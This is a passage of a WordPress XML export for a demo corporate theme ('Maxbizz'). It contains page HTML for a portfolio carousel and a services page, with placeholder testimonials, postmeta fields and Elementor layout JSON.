								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/strategy/">strategy</a></p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>861</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:47:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:47:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-carousel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"a208449","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"170","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"120","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e6f2aa0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"444437c","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"01f9e90","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"d3bcd52","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"cadf2c3","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"c55927b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b91e1d6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0af249f","elType":"widget","settings":{"tshow_mobile":"1","dots_spacing_mobile":{"unit":"px","size":-60,"sizes":[]}},"elements":[],"widgetType":"ipcarousel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;}}}}s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;s:12:"stitle_color";i:1;s:29:"stitle_typography_font_weight";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:5:"align";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}s:14:"section_layout";a:1:{s:6:"layout";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:10:"ipcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:12:"tshow_mobile";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:1:{s:19:"dots_spacing_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/</link>
		<pubDate>Fri, 11 Sep 2020 08:07:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=868</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>				<p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>				<p>We identify the mission, goals and strategic priorities of a business project or non-profit organization.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Explore More</a>	    
	        testimonials	        <h3>What People Say About Us</h3>	    
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Mary Grey</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Samanta Fox</h6>							client of company						
		        <a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>868</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 08:07:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 08:07:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"50913d0","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6431d9b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"2d79a54","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"d6f8efd","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"403e7f7","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"53a4218","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"40e4f84","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"33cde09","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"99d507e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"8bc24d4","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"beb742d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3c860b2","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":903},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"44fef9d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"5e5c00d","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true},{"id":"89aa30f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"d6a51ae","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"edcdae5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9ec60d8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"880ea70","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"e248180","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"ec9ed31","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"6dc6dd7","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"7a91f5f","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5e9f9e9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a13a110","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":906},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5df37f4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1cb357c","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":907},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"da8c1a3","elType":"section","settings":{"background_background":"classic","background_color":"#F8F8F8","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-grid.jpg","id":878},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","background_bg_width_tablet":{"unit":"px","size":0,"sizes":[]},"padding":{"unit":"px","top":"150","right":"0","bottom":"120","left":"0","isLinked":false},"gap":"extended","structure":"20","background_position_tablet":"center right","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"e17a0cf","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[],"isInner":false},{"id":"46be8a0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"b31309c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_family":"Raleway","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","subtitle_style":"is_line","stitle_color":"#95A2AC"},"elements":[],"widgetType":"iheading"},{"id":"1cb8d1d","elType":"widget","settings":{"align":"left","testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"","id":""},"tname":"Oliver Simson","tjob":"client of company","_id":"4071f49"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Mary Grey","tjob":"client of company","_id":"0a8366e"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Samanta Fox","tjob":"client of company","_id":"aeffe7c"}],"dots_style":"vertical","dots_spacing":{"unit":"px","size":-300,"sizes":[]},"dots_spacing_tablet":{"unit":"px","size":-70,"sizes":[]},"_margin":{"unit":"%","top":"0","right":"-5","bottom":"0","left":"0","isLinked":false},"arrow_align":"bottom","_padding_tablet":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"job_color":"#8D8D8D","job_typography_typography":"custom","job_typography_font_family":"Raleway","job_typography_font_size":{"unit":"px","size":14,"sizes":[]},"job_typography_font_weight":"500"},"elements":[],"widgetType":"itestimonials2"}],"isInner":false}],"isInner":false},{"id":"1ce3e2f","elType":"section","settings":{"background_background":"classic","background_color":"#55BB53","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fe015a4","elType":"column","settings":{"_column_size":100,"